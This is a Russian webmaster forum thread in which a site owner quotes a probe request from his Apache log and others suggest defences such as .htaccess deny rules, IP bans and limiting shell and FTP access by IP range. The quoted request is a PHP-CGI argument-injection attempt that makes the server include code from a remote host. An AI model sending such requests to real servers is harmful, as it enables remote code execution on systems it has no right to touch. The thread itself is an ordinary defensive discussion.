Нащупывают уязвимости сервера

Сообщений: 3448 Регистрация: Май 2011

6 Октября 2013 22:33

Сегодня заметил, что сайт долго открывается, полез в логи (вдруг доссят подумал я)

Заметил странный повторяющийся запрос:

Цитата
12.175.18.217 - - [07/Oct/2013:00:27:14 +0600] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt HTTP/1.0" 403 482 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"

По ссылке http://61.19.253.26/echo.txt нашлось следующее:

Код
<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

По этому куску кода нашлось следующее: https://plus.google.com/110937633080014620803/posts/TKa9TUWafjs
Как я понял, мой сервер нащупывают..

Пока запретил данному айпи коннектиться к серверу через .htaccess
Что посоветуете? Кто-то с таким сталкивался?

Не подписываюсь на темы, так что не слежу за вопросами, которые вы оставляете в топике после меня. Если нужно получить ответ, пишите в ЛС с указанием ссылки на мой комментарий.

Олег

Сообщений: 3242 Регистрация: Окт 2010

6 Октября 2013 22:53

У меня время от времени подобных запросов просто шквал появляется. Пока тьфу - тьфу все в порядке. Правда половина из них направленна на поиск уязвимостей базы данных, которая в моем случае отсутствует:) Также ограничил доступ к серверу по ip

Прогон по Twitter, FriendFeed, Jujuju, и Livejournal - быстробот гарантирован

Качественный хостинг от 50 р.

Лучшая биржа контента

GoogleBot

Сообщений: 261 Регистрация: Сен 2013

6 Октября 2013 23:05

Выставляем правильные права на директории.

Также, в хтаксесс вставляем:

Код
Order allow,deny Deny from all

Изменено: GoogleBot - 6 Октября 2013 23:06

Coder

Сообщений: 10797 Регистрация: Мар 2013

6 Октября 2013 23:44

Цитата
Олег пишет: ограничил доступ к серверу по ip

Как-то много было ботов и всякого, и утомительно получалось все время по ftp в htaccess заходить. Небольшой скрипт помог упростить задачу (в обход htaccess) - и, что самое интересное, потихоньку перестали "долбится" время от времени новый всплывает, но это уже несравнимо с прежним:

Запрет/бан доступа на сайт/страницу по ip через php: _http://coder.hol.es/archive/ban_ip_php

✓ Проверенные скрипты и полезности для сайта

✓ Курсы

✓ Сервис временных ссылок

Алик Яушев

Сообщений: 3448 Регистрация: Май 2011

7 Октября 2013 06:50

Цитата
Coder пишет: утомительно

Ничего себе решение для утомительно...
Честно, улыбнуло... ваш способ не легче.

Coder

Сообщений: 10797 Регистрация: Мар 2013

7 Октября 2013 10:30

Цитата
Алик Яушев пишет: Честно, улыбнуло... ваш способ не легче.

=) Легче таки. По ftp нужно входить, открывать htaccess, смотреть лог, сравнивать, внесен или нет ip (а если их 100 и более?). А здесь удобно - зашел в админку, вызвал всплывающее окно, расположил его в окне лога, выбрал все нужные ip и тут же внес и сохранил. Если были дубли - убралось, все остальное - записалось и отсортировалось. В ftp не нужно входить, htaccess трогать не нужно.

Имхо, конечно.

Алик Яушев

Сообщений: 3448 Регистрация: Май 2011

7 Октября 2013 10:39

В моем случае все делаю через SSH клиент.
Выявляю запросы: tail -f /var/log/apache2/site_access.log
Через тот же клиент делаю корректировку в штацесс. Дело 2-ух минут максимум.
Я не любитель сторонних php скриптов.

Coder

Сообщений: 10797 Регистрация: Мар 2013

7 Октября 2013 11:11

Цитата
Алик Яушев пишет: Я не любитель сторонних php скриптов

Понятно. Каждый выбирает по-своему.

Олег

Сообщений: 3242 Регистрация: Окт 2010

7 Октября 2013 15:15

Цитата

Coder пишет:
Олег пишет:
ограничил доступ к серверу по ipКак-то много было ботов и всякого, и утомительно получалось все время по ftp в htaccess заходить. Небольшой скрипт помог упростить задачу (в обход htaccess) - и, что самое интересное, потихоньку перестали "долбится" время от времени новый всплывает, но это уже несравнимо с прежним:

Так я не ip баню, а ограничил доступ к серверу по ip, т.е. к шелу и ftp можно подключиться только с моего ip. Тоже самое касается админки каждого сайта. А каждый ip банить - это гиблое дело

Индульгенция

Сообщений: 1513 Регистрация: Окт 2013

#10

7 Октября 2013 15:59

Олег, хотел тоже как и вы ограничить доступ только своим ипом, да только задумался и передумал. А задумался вот над какими вопросами:

IP та у меня динамический, как быть тогда?
А вдруг нужно будет срочно с чужой точки доступа зайти (в гостях или командировке), как тогда быть?

Блатные слова.

Олег

Сообщений: 3242 Регистрация: Окт 2010

#11

7 Октября 2013 17:55

Цитата
Индульгенция пишет: IP та у меня динамический, как быть тогда?

У меня тоже, мегафон - модем. Попросил у них диапазон ip своего региона и сделал фильтр по маске

Цитата
Индульгенция пишет: А вдруг нужно будет срочно с чужой точки доступа зайти (в гостях

У вас такая необходимость часто появляется? У меня за 3 года работы в сети не разу.

Цитата
Индульгенция пишет: командировке

Заблаговременно изменить фильтр либо убрать его вообще на время командировки

Индульгенция

Сообщений: 1513 Регистрация: Окт 2013

#12

7 Октября 2013 18:01

Цитата
Олег пишет: У меня тоже, мегафон - модем. Попросил у них диапазон ip своего региона и сделал фильтр по маске

Этот вопрос решен. теперь знаю ответ.

Цитата
Олег пишет: У вас такая необходимость часто появляется? У меня за 3 года работы в сети не разу.

А вот это как раз бывает. Не совсем часто, но раза 2-3 в месяц. Подойдет только:

Цитата
Олег пишет: убрать его вообще на время

Олег

Сообщений: 3242 Регистрация: Окт 2010

#13

7 Октября 2013 18:05

Цитата
Индульгенция пишет: А вот это как раз бывает. Не совсем часто, но раза 2-3 в месяц. Подойдет только:

Мобильный модем и ходите с ним в гости:)

Индульгенция

Сообщений: 1513 Регистрация: Окт 2013

#14

7 Октября 2013 18:11

"Убедили"

. Осталось теперь реализовать. Спасибо за информацию.

Coder

Сообщений: 10797 Регистрация: Мар 2013

#15

7 Октября 2013 18:54

Цитата
Олег пишет: А каждый ip банить - это гиблое дело

Тут от ситуации зависит. Тут комплексный подход к ряду проблем: например, некоторые боты, так сказать, злостные, оставляли рекламу в отзывах, форумах. ip один и тот же - "долбятся" по-тупому, так сказать, ресурсы кушают. Этих - сразу в бан, для остальных - капчу математическую или картиночную.

Но, как уже было сказано, каждый свое выбирает.

Имхо, конечно.

Кстати, на некоторых хостингах (jino, например), можно вообще отключать доступ по ftp и подключать по необходимости из аккаунта.

Изменено: Coder - 7 Октября 2013 18:56

Похожие темы:

11.02.2012 10:36	Уязвимости в почтовом сервисе "Яндекса"
06.01.2012 17:29	подскажите кто может проверить сайт на уязвимости
01.02.2011 21:39	Microsoft предупредила пользователей об уязвимости в интернет Explorer
02.11.2010 17:02	Google заплатит пользователям за найденные на своих сайтах уязвимости

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
08:35 Штрафы за крипту до 2 млн + ап Яндекса 19 апреля - что опять поменяли и куда всё катится? 08:19 Яндекс-ап 20 марта и похороны ChatGPT, Claude и Gemini. Считаем убытки 23:03 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 07:34 биржи в 26-м окончательно сдохли или кто-то еще ковыряет этот шлак? 06:47 В Яндексе позиции держатся, а трафик проседает - стало заметно сильнее 06:34 Что такое Яндекс Икс / Как накрутить Яндекс ИКС 06:21 ИКС Яндекс АПдейт 1 апреля 2026. Обновлён алгоритм расчёта	05:21 Веривикация Авито 04:52 Верификация вашего профиля Авито на ИП или ООО, готовые новореги ( не всегда есть в наличие, уточняйте) 22:47 Volna.money 22:45 GoodsMoney.io 21:54 [SOFT] Мультиканальный ИИ-агент (Telegram + API): Автономный контент и Smart Engagement (Llama 3.1 / Groq) 19:29 BIGPROXY.SHOP - Резидентные Ротационные Backconnect Proxy USA EUROPA MIX [Безлимитный трафик] 17:16 buyingproxy.com \| $0.95/GB Residential Proxies - 80M+ IPs \| No Bandwidth Expiry	07:56 Точные прогнозы на футбол 23:00 арбитражники 22:50 Список обновленных тем пуст... 18:58 Ставки на супер тренды в спорте 07:46 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 21:08 Подтягиваем физкультурку 16:29 С юмором по жизни!